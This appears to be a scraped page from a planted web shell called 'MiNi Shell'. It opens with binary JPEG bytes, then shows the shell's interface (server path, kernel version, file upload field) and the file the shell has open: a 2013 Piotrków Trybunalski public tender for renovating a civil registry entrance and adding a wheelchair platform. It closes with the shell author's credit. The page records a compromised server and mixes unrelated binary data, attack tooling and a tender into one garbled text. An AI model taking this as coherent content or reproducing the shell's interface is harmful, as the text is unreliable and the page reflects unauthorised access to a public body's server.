JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20130610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20130610/221082-N-2013.html

<p class="kh_header"><b>Piotrków Trybunalski: WYKONANIE PRZEBUDOWY WEJŚCIA DO BUDYNKU USC OBEJMUJĄCE REMONT SCHODÓW, DOSTAWĘ I MONTAŻ PLATFORMY DLA NIEPEŁNOSPRAWNYCH WRAZ 
Z WYKONANIEM ŚCIANKI OPOROWEJ PRZY ISTNIEJĄCYCH SCHODACH ZEWNĘTRZNYCH, PRZEBUDOWA I ARANŻACJA WNĘTRZ CIĄGÓW KOMUNIKACYJNYCH W BUDYNKU URZĘDU MIASTA - URZĘDU STANU CYWILNEGO</b><br>
<b>Numer ogłoszenia: 221082 - 2013; data zamieszczenia: 10.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE PRZEBUDOWY WEJŚCIA DO BUDYNKU USC OBEJMUJĄCE REMONT SCHODÓW, DOSTAWĘ I MONTAŻ PLATFORMY DLA NIEPEŁNOSPRAWNYCH WRAZ 
Z WYKONANIEM ŚCIANKI OPOROWEJ PRZY ISTNIEJĄCYCH SCHODACH ZEWNĘTRZNYCH, PRZEBUDOWA I ARANŻACJA WNĘTRZ CIĄGÓW KOMUNIKACYJNYCH W BUDYNKU URZĘDU MIASTA - URZĘDU STANU CYWILNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót:
ROBOTY BUDOWLANE
1. RODZAJ INWESTYCJI.
Teren,  na którym realizowany  jest  obiekt  nie  jest  objęty ustaleniami  obowiązującego miejscowego planu zagospodarowania przestrzennego.
W  granicach   opracowywanego   terenu   i  w  bezpośrednim  sąsiedztwie   nie  występują obszary   i   obiekty   podlegające   ochronie   na   podstawie   przepisów   odrębnych   i   obszary ograniczonego użytkowania. 
Realizacja inwestycji obejmuje remont schodów zewnętrznych polegający na wymianie okładzin   kamiennych,   wykonaniu   platformy   dla   osób   niepełnosprawnych   przebudowę chodnika przy schodach.

2. ISTNIEJĄCY STAN ZAGOSPODAROWANIA DZIAŁKI.
Działka nr  302 zlokalizowana  jest  w Piotrkowie Trybunalskim.  Na opracowywanym 
terenie znajduje się budynek Urzędu Miasta -Urząd Stanu Cywilnego, teren jest uzbrojony.

3. FUNKCJA ZABUDOWY I ZAGOSPODAROWANIA TERENU.
      1) Funkcja zabudowy  i zagospodarowania  terenu  według wydanych warunków w decyzji  o  lokalizacji celu publicznego nr 53:2012.
      2) Projektowane elementy zagospodarowania terenu obejmujące budowę platformy dla osób niepełnosprawnych oraz przebudowę ciągów pieszych.
Zasady kształtowania ładu przestrzennego według wydanych warunków w decyzji o 
lokalizacji celu publicznego nr 53/2012. Projektowana inwestycja nie narusza interesów osób trzecich. Na   opracowywanym  terenie   nie   obowiązują   nakazy,   zakazy,   dopuszczenia   oraz ograniczenia w zagospodarowaniu terenu.
Prowadzenie   inwestycji   powinno   odbywać   się   zgodnie   z   ogólnie   przyjętymi  
zasadami ochrony przyrody - ustawa z dnia 16 kwietnia 2004 roku o ochronie przyrody (Dz. U. Nr 92, poz. 880 ze zmianami), zgodnie z art. 74 ust. 1 ustawy z dnia 27 kwietnia 2001 roku. Prawo ochrony środowiska (Dz. U. Nr 62, poz. 627 z 2001 roku z późniejszymi zamianami). Planowana   inwestycja   znajduje   się   w   obszarze   podlegającym   ochronie konserwatorskiej i wymaga pozwolenia Wojewódzkiego Konserwatora Zbytków.
Działka   położona   poza   granicami   terenów  górniczych,   obszarów  narażonych   na niebezpieczeństwo powodzi i terenów narażonych na osuwanie mas ziemnych. 

4. ZESTAWIENIE POWIERZCHNI ZAGOSPODAROWANIA TERENU.
- Powierzchnia zabudowy projektowana -      2,50 m2

III.  PROJEKT BUDOWLANY 
1. PRZEZNACZENIE I CHARAKTERYSTYKA OGÓLNA.
Zadaniem  projektowym  było   opracowanie   dokumentacji   projektowej   obejmującej swoim zakresem przebudowę i remont schodów zewnętrznych oraz przebudowę i aranżację wnętrz w budynku Urzędu Miasta w Piotrkowie Trybunalskim. 
Zakres robót do zrealizowania w ramach projektu: 
- rozebranie istniejącej okładziny kamiennej schodów,
- wykonanie szybu i podestu oraz platformy dla osób niepełnosprawnych,
- wykonanie sufitów podwieszonych oraz elementów ozdobnych w ciągach   
  komunikacyjnych,
- przebudowa instalacji elektrycznej oświetlenia,
- wykonanie prac wykończeniowych (malowanie, tapety, itp.).
 
2. FUNKCJA POMIESZCZEŃ.
Projektowany   remont   części   pomieszczeń   w   poziomie   parteru   nie   zmienia   ich dotychczasowej   funkcji,  ma on na celu podniesienie walorów estetycznych  remontowanych pomieszczeń.

3. EKSPERTYZA TECHNICZNA DOTYCZĄCA WYKONYWANYCH PRAC.
Ekspertyza  techniczna dotyczy części  budynku,  w której  projektowany  jest   remont 
schodów zewnętrznych oraz remont pomieszczeń. 
Budynek o konstrukcji murowanej z elementami żelbetowymi.
Projektowany   remont   pomieszczeń   oraz   schodów   zewnętrznych   nie   powoduje naruszania elementów konstrukcyjnych budynku. Wykonanie prac remontowo-adaptacyjnych prowadzić należy w oparciu o projekt,  z zachowaniem warunków technicznych wykonania i odbioru robót, przepisów bezpieczeństwa i higieny pracy. Roboty   należy   prowadzić   pod   nadzorem  osób   posiadających   stosowne   uprawnienia budowlane.

IV.  WIELKOŚCI CHARAKTERYSTYCZNE POMIESZCZEŃ 
PARTER:
Zestawienie projektowanych pomieszczeń i powierzchni:
1:01.   Hol       23,57 m2
1:02.   Korytarz     18,58 m    
2
Razem:   42,15 m2

V. ROZWIĄZANIA KONSTRUKCYJNO-MATERIAŁOWE.
1. FUNDAMENTY.
1.1. Ławy fundamentowe.
Zaprojektowano  ławy fundamentowe żelbetowe monolityczne,  wylewane na mokro z 
betonu klasy B-20 zbrojone stalą klasy A-III (34 GS), A-0 (St0S).
Posadowienie  fundamentów budynku przyjęto na poziomie -1,00 m w odniesieniu do poziomu chodnika przy schodach. 
Pod ławy fundamentowe wykonać podkład z betonu B-10 grubości warstwy 10 cm. Wymiary ław  fundamentowych   oraz   szczegóły   ich  wykonania   przedstawiono   na   rysunkach   -   rzut fundamentów oraz rysunkach konstrukcyjnych ław fundamentowych.
1.2. Ściany fundamentowe.
Ściany fundamentowe do wysokości   grubości  25 murowane z bloczków betonowych 
na zaprawie cementowej. 
2. PŁYTY ŻELBETOWE.
Płyty żelbetowe, monolityczne z betonu klasy B-20 zbrojone prętami ze stali klasy A-III 
(34 GS), A-0 (St0S) wg rysunków konstrukcyjnych.
3. PLATFORMA DLA OSÓB NIEPEŁNOSPRAWNYCH.
Platforma   nieobudowana   zewnętrzna     śrubowa   o   wysokości podnoszenia 2,20m. 
 4. OKŁADZINA KAMIENNA SCHODÓW
Istniejącą kamienną okładzinę schodów oraz cokołu w obrębie wejścia należy rozebrać. W jej miejsce projektuje się wykonanie nowej okładziny kamiennej z granitu gr. 3cm.
Demontaż, czyszczenie, piaskowanie, malowanie balustrad przy schodach wraz z ponownym montażem.
5. TYNKI WEWNĘTRZNE, UZUPEŁNIENIA TYNKÓW.
Tynki wewnętrzne remontowanej części budynku w razie potrzeby, w miejscach gdzie 
ich   powiązanie   z   ścianą   jest   luźne   należy   skuć.  Uzupełnienie   tynków wewnętrznych   na remontowanych   ścianach,   ościeżach   oraz   uzupełnienia   tynków  po  wykonanych   robotach instalacyjnych wykonać  jako cementowo-wapienne kat.   III.  Ściany krzywe bądź  nierówne doprowadzić do równej płaszczyzny szczególnie w korytarzu. Na powierzchniach ścian, sufitów pod malowanie emulsyjne należy wykonać gładzie gipsowe. 
6. ELEMENTY PODWIESZONE.
Elementy podwieszone  oraz sufity wykonane zostaną z płyty gipsowo-kartonowej na 
stelażu metalowym  ocynkowanym  z  profili   systemowych  dla   sufitów  podwieszonych.  W elementy dekoracyjne wbudowane zostanie oświetlenie 
7. ELEMENTY DREWNIANE.
Elementy   drewniane   zabezpieczające   ściany   należy   poddać   renowacji.   Elementy drewniane pionowe zabezpieczające ościeża z kątowników 50x50mm. Listwy przypodłogowe korytarza należy wymienić na drewniane wys. 20cm.
8. MALOWANIE I KOLORYSTYKA.
Okładzina kamienna schodów wejściowych płyty kamienne -granit, 
Malowanie   sufitów   oraz   ścian   do   sztukaterii   włącznie,   w   remontowanych 
pomieszczeniach - emulsyjne po uprzednim wykonaniu gładzi gipsowych.
Na   ścianach   korytarza   poniżej   sztukaterii   przyklejona   zostanie   tapeta  winylowa   o nieregularnej fakturze w formie pionowych tłoczonych pasów w kolorze stalowo szarym. Ściany holu poniżej  sztukaterii  malowane  farbą sylikonową  lub akrylową w kolorze NCS 0618-G54Y.
Malowanie   elementów   drewnianych   korytarza(odboje   ścienne,   kątowniki 
zabezpieczające ościeża oraz drzwi) lakierobejcą w kolorze naturalnego dębu. 
Malowanie istniejących drzwi korytarza emalią do renowacji na kolor RAL 1018.
9. INSTALACJE.
Przebudowywane pomieszczenia wymagają przebudowy na tym poziomie instalacji z 
włączeniem się w istniejące. Projektowana modernizacja instalacji:
- elektrycznej: oświetlenia

ROBOTY  SANITARNE
 Przesunięcie rur spustowych, podłączenie kratki ściekowej podszybia do istniejącej KS.

ROBOTY ELEKTRYCZNE

 Instalacja oświetlenia.
Instalację oświetlenia wykonać przewodem YDY 3x1,5 pod tynkiem. Do wykonania instalacji oświetlenia stosować osprzęt p/t. Instalację przyłączyć do istniejącej instalacji elektrycznej ciągów komunikacyjnych.

Do oświetlenia schodów zewnętrznych zastosować kolumny 4800 LED 88. Kolumny przymocować przy pomocy uchwytów do ścian bocznych schodów lub ustawić na fundamencie B-60 wkopanym w ziemię (wybór należy do inwestora). Słupy zasilić kablem YKY 3x2,5. Kabel prowadzić pod tynkiem w rurach osłonowych PCV. Pomiędzy słupami należy poprowadzić taśmę Fe:Zn 20x4 którą przyłączyć do GSU budynku. W słupach należy zamontować kablowe złącze słupowe TB-11, przez które jest prowadzona linia kablowa. Każdą oprawę należy zasilić przewodem YDYżo 3x2,5. Jako element sterujący linią oświetleniową zastosować cyfrowy programator astronomiczny zamontowany w obudowie RN65 1x6. Instalację zabezpieczyć w rozdzielnicy wyłącznikiem nadmiarowym S301B10. Kabel przyłączyć do istniejącej instalacji budynku.

Ochrona przeciwporażeniowa realizowana jest poprzez szybkie samoczynne wyłączenie obwodów.
Uwaga:
Całość robót wykonać zgodnie z obowiązującymi przepisami zawartymi w warunkach technicznych wykonywania i odbioru robót budowlano montażowych część V instalacje elektryczne. Po zakończeniu prac wykonać pomiary skuteczności działania środków ochrony przeciwporażeniowej.

2. WYMAGANIA OGÓLNE WYKONANIA ROBÓT:
a) Wszystkie roboty winny być prowadzone zgodnie z Prawem Budowlanym.

b) Niezbędnym jest przed zgłoszeniem oferty szczegółowe zapoznanie się z warunkami terenowymi realizacji robót.
c) Zamówienie  należy  wykonać  ściśle  wg projektu technicznego i specyfikacją  techniczną wykonania i odbioru robót
d) Wszystkie materiały użyte do budowy muszą posiadać: 
- Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych.
- Deklarację zgodności lub certyfikat zgodności z: Polską Normą lub, Aprobatą techniczną w przypadku wyrobów dla których nie ustanowiono Polskiej Normy, jeżeli nie są objęte certyfikacją.
e)W kalkulacji ceny uwzględnić wykonanie w 4 (czterech) egzemplarzach: 
- dokumentacji powykonawczej, 
- map inwentaryzacyjnych,
- niezbędnych protokołów badań i sprawdzeń,
Powyższe dokumenty powinny być przekazane Zamawiającemu celem sprawdzenia nie później niż na 7 dni przed planowanym odbiorem całości zadania.
f) Wykonawca wyłoniony w przetargu uzgodni harmonogram robót z Zamawiającym 

g) Wszystkim wskazaniom znaków towarowych, patentów lub pochodzenia występującym w dokumentacji technicznej towarzyszą wyrazy lub równoważny , co oznacza, że dopuszcza się zastosowanie urządzeń i materiałów nie gorszych niż opisywanym w dokumentacji tj. spełniających wymagania techniczne, funkcjonalne i jakościowe co najmniej takie jak wskazane w dokumentacji projektowej lub lepsze. Wykonawca, który zdecyduje się stosować urządzenia i materiały równoważne opisywane w dokumentacji, obowiązany jest wykazać, że oferowane przez niego materiały i urządzenia spełniają wymagania określone w dokumentacji technicznej. Zgodę na zmianę w zastosowanych materiałach należy uzyskać przed wbudowaniem - potwierdzoną przez inspektora nadzoru..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia, zamawiający uzna za spełniony w przypadku, gdy wykonawca:

a)wykaże co najmniej dwa zamówienia (wykonane w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia tj. 
- wykonanie dwóch robót polegających na remoncie w budynku użyteczności publicznej o wartości co najmniej 150 000,00zł brutto każda - wg załącznika nr  4;
b)załączy dokumenty potwierdzające, że roboty wyszczególnione w załączniku nr 4 zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, zostanie przez zamawiającego uznany za spełniony w przypadku, gdy wykonawca wykaże i przedłoży: 

wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych a także zakresu wykonywanych przez nie czynności - wg załącznika nr 3. Osoby te muszą posiadać:
- uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności:
-uprawnienia do kierowania robotami budowlanymi, sanitarnymi i elektrycznymi.
Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1;
2.Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2;
3.Oświadczenie o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne - wg załącznika nr 5;
4. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 6.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa będzie zawarta na podstawie wzoru stanowiącego załącznik do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
Piotrków Tryb. 97-300.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2013 godzina 09:00, miejsce: Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
Piotrków Tryb. 97-300 
punkt informacyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com